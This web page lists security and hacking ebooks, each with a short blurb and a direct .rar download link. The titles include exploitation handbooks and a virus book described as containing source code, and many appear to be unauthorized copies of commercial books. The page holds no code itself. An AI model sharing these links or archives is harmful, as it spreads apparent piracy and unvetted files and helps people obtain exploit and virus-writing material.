Explain the critical need for Vulnerability Management (VM), Detail the essential best-practice steps of a successful VM Program, Outline the various VM Solutions - including the pros & cons of each, Highlight the award-winning QualysGuard VM solution, Provide a 10-point checklist for removing vulnerabilities from your key resources.

Download Link:-

http://www.insecure.in/ebooks/vulnerability_management_for_dummies.rar

Hacking Windows Vista :-
Vista is the most radical revamping of Windows since 1995. However, along with all the fantastic improvements, there are a couple of things that likely drive you up the wall. Don’t worry, though—just join forces with author Steve Sinchak and you’ll end up feeling as though Microsoft designed Vista just for you! He shows you how to tweak logon screen settings, build custom Sidebar gadgets, personalize Aero Glass with themes and visual styles, turn your PC into an HDTV media center, fine-tune your firewall, and more...!

Download Link:-

http://www.insecure.in/ebooks/vista_hacks.rar

Web Hacking :-
Exposes complete methodologies showing the actual techniques and attacks. Features include :-
* Overview of the Web and what hackers go after
* Complete Web application security methodologies
* Detailed analysis of hack techniques
* Countermeasures
* What to do at development time to eliminate vulnerabilities
* New case studies and eye-opening attack scenarios
* Advanced Web hacking concepts, methodologies, and tools

Download Link:-

http://www.insecure.in/ebooks/web_hacking_attacks_defence.rar

Viruses Revealed :-
With the growing number of computer virus infections today--and the billions of dollars spent on clean-up efforts--virus protection has become everybody's business.
This detailed guide offers full-scale coverage and analysis of the origin, structure, and technology behind the expanding array of computer viruses, and addresses current methods of detection and prevention.

Download Link:-

http://www.insecure.in/ebooks/viruses_revealed.rar

Hacker's Black-Book :-
Easy to understand with many examples. Every day you hear in the daily news about hackers, virus, worms and trojans, SUB7, TCP, IP, PING, spoofing, sniffing, DDOS attacks, ...?
And you don't know exactly what it is and how hackers do that.
Don't rest a "lamer", Hacker's Blackbook let's you know and discovers many secrets.
Incredible how easy hacking and cracking is!
The book shows how simple you can use these programs.
And many more themes in 19 detailed chapters...

Download Link:-

http://www.insecure.in/ebooks/hackers_black_book.rar

501 Website Secrets :-
What kind of secrets are included in 501 Web Site Secrets? Well, using this book is as simple as turning to the chapter on a particular site, reading through the secrets, then trying them on your own. You don’t need any particular technical expertise to take advantage of these secrets, although some familiarity with the sites in question is helpful. There’s no fancy programming, no high-level coding, just a lot of common-sense information that you probably didn’t know before. Containing:-
Yahoo!, Google, AOL, MSN, Amazon, Lycos, Ask, Altavista, Microsoft, etc.

Download Link:-

http://www.insecure.in/ebooks/501_website_secrets.rar

Gray Hat Hacking :-
A fantastic book for anyone looking to learn the tools and techniques needed to break in and stay in. Very highly recommended whether you are a seasoned professional or just starting out in the security business. Basically divided into five parts :-
Part I: Introduction to Ethical Disclosure,
Part II: Penetration Testing and Tools ,
Part III: Exploits 101,
Part IV: Vulnerability Analysis,
Part V: Malware Analysis

Download Link:-

http://www.insecure.in/ebooks/gray_hat_hacking.rar

Hacker Highschool :-
The Hacker Highschool project is the development of license-free, security and privacy awareness teaching materials and back-end support for teachers of elementary, junior high, and high school students. Today's teens are in a world with major communication and productivity channels open to them and they don't have the knowledge to defend themselves against the fraud, identity theft, privacy leaks and other attacks made against them just for using the Internet. This is the reason for Hacker Highschool.

Download Link:-

http://www.insecure.in/ebooks/hacker_highschool_13ebooks.rar

CheatBook-2008 :-
Cheat-Book (02/2008) - Issue February 2008 - A Cheat-Code Tracker with Hints for several popular PC Action and adventure Games. 488 PC Games, 53 Walktroughs for PC and 114 Console Cheats are represented in this new version from Strategy Games, Adventure Games to Action Games. This Database represents all genres and focuses on recent releases.

Download Link:-

http://www.insecure.in/ebooks/cheatbook_2008.rar

Windows-XP Hacks :-
Completely revised and updated, this smart collection of insider tips and tricks covers the XP operating system from start to finish, including all the new features that come with Service Pack 2 (SP2).
You'll also find time saving hacks for security, file distribution, digital media, web browsing, and more.
An ideal all-in-one resource for XP beginners, as well as more experienced power users.

Download Link:-

http://www.insecure.in/ebooks/winxp_hacks.rar

A Little Black Book :-
"A Little Black Book Of Computer Viruses" is the first in the series of three. Deeply covers all the basic types along with source codes. It focuses on topics like:- types of viruses, functional elements of viruses, tools used for writing viruses, storage for viruses, installation in memory, etc. Source codes also given for TIMID, INTRUDER, KILROY, STEALTH, Basic Boot Sector, etc. viruses.

Download Link:-

http://www.insecure.in/ebooks/black_book_of_compuer_viruses.rar

Hacking GPS :-
Hacking GPS shows you how to get more out of owning a GPS receiver. Written with the Extreme Technology community in mind, this book shows you how to do a variety of different things with your receiver:
* Build custom cabling
* Protecting your GPS from the elements
* Connecting your GPS to a PC or PDA
* Build and mount external antennas
* Load new, modified, firmware onto your device
* Access secret diagnostic screens and test utilities
* GPS games & much more...!
If you've got a GPS and you want to be able to make the most of it then this is the book for you!

Download Link:-

http://www.insecure.in/ebooks/hacking_gps.rar

Oracle Hackers Handbook :-
While Oracle continues to improve the security features of its product, it still has a long way to go. David Litchfield has devoted years to relentlessly searching out the flaws in this ubiquitous database system and creating defenses against them. Now he offers you his complete arsenal to assess and defend your own Oracle systems.
This in-depth guide explores every technique and tool used by black hat hackers to invade and compromise Oracle. It shows you how to find the weak spots and defend them. Without that knowledge, you have little chance of keeping your databases truly secure.
Discover how to deal with the security flaws revealed in the Oracle RDBMS. Explore some never-before-published forays into Oracle security holes and learn to defend them from attack.

Download Link:-

http://www.insecure.in/ebooks/oracle_hackers_handbook.rar

Security & Cryptography :-
6th International Conference, SCN 2008, Amalfi, Italy, September 10-12, 2008, Proceedings

Editors: Rafail Ostrovsky, Roberto De Prisco and Ivan Visconti
Hardcover: 423 pages
Publisher: Springer; 1 edition (September 1, 2008)
Language: English
ISBN-10: 3540858547
ISBN-13: 978-3540858546
Format: pdf
This book constitutes the refereed proceedings of the 6th International Conference on Security and Cryptology for Networks, SCN 2008, held in Amalfi, Italy, in September 2008

Download Link:-

http://www.insecure.in/ebooks/sec_crypt_networks.

Shellcoder's Handbook :-
The Shellcoders Handbook, discovering and exploiting security holes is the second edition. It covers introduction to exploitation: linux on x86 contains stack overflows, shellcodes, format string bugs, heap overflows. Also for windows platform and solaris exploitation too. OS X shellcode, cisco ios exploitaion, unix kernel overflows, windows kernel hacking, protection mechnism and much more.....!

Download Link:-

http://www.insecure.in/ebooks/the_shellcoders_handbook.rar

Hacking Exposed VoIP :-
This book illuminates how remote users can probe, sniff, and modify your phones, phone switches, and networks that offer VoIP services. Most importantly, the authors offer solutions to mitigate the risk of deploying VoIP technologies.
Block debilitating VoIP attacks by learning how to look at your network and devices through the eyes of the malicious intruder. Hacking Exposed VoIP shows you, step-by-step, how online criminals perform reconnaissance, gain access, steal data, and penetrate vulnerable systems. All hardware-specific and network-centered security issues are covered alongside detailed countermeasures, in-depth examples, and hands-on implementation techniques.
Inside, you'll learn how to defend against the latest DoS, man-in-the-middle, call flooding, eavesdropping, VoIP fuzzing, signaling and audio manipulation, Voice SPAM/SPIT, and voice phishing attacks.

Download Link:-

http://www.insecure.in/ebooks/hacking_exposed_voip.rar

Google Apps Hacks :-
Can Google applications really become an alternative to the venerable Microsoft Office suite? Conventional wisdom may say no, but practical wisdom says otherwise. Right now, 100,000 small businesses are currently running trials of Google office applications. So are large corporations such as General Electric and Proctor & Gamble. Google Apps Hacks gets you in on the action with several ingenious ways to push Google's web, mobile, and desktop apps to the limit.
The scores of clever hacks and workarounds in this book help you get more than the obvious out of a whole host of Google's web-based applications for word processing, spreadsheets, PowerPoint-style presentations, email, calendar, and more by giving you ways to exploit the suite's unique network functionality.

Download Link:-

http://www.insecure.in/ebooks/google_apps_hacks.rar

Botnets: The Killer Web Applications :-
The book begins with real world cases of botnet attacks to underscore the need for action. Next the book will explain botnet fundamentals using real world examples. These chapters will cover what they are, how they operate, and the environment and technology that makes them possible. The following chapters will analyze botnets for opportunities to detect, track, and remove them. Then the book will describe intelligence gathering efforts and results obtained to date. Public domain tools like OurMon, developed by Jim Binkley of Portland State University, will be described in detail along with discussions of other tools and resources that are useful in the fight against Botnets.
* This is the first book to explain the newest internet threat Botnets, zombie armies, bot herders, what is being done, and what you can do to protect your enterprise.
* Botnets are the most complicated and difficult threat the hacker world has unleashed - read how to protect yourself.

Download Link:-

http://www.insecure.in/ebooks/botnets_the_killer_web_applications.rar

Hacking Exposed - 6 :-
The world's bestselling computer security book--fully expanded and updated.
* New chapter on hacking hardware, including lock bumping, access card cloning, RFID hacks, USB U3 exploits, and Bluetooth device hijacking * Updated Windows attacks and countermeasures, including new Vista and Server 2008 vulnerabilities and Metasploit exploits * The latest UNIX Trojan and rootkit techniques and dangling pointer and input validation exploits * New wireless and RFID security tools, including multilayered encryption and gateways * All-new tracerouting and eavesdropping techniques used to target network hardware and Cisco devices * Updated DoS, man-in-the-middle, DNS poisoning, and buffer overflow coverage * VPN and VoIP exploits, including Google and TFTP tricks, SIP flooding, and IPsec hacking * Fully updated chapters on hacking the Internet user, web hacking, and securing code

Download Link:-

http://www.insecure.in/ebooks/hacking_exposed_6.rar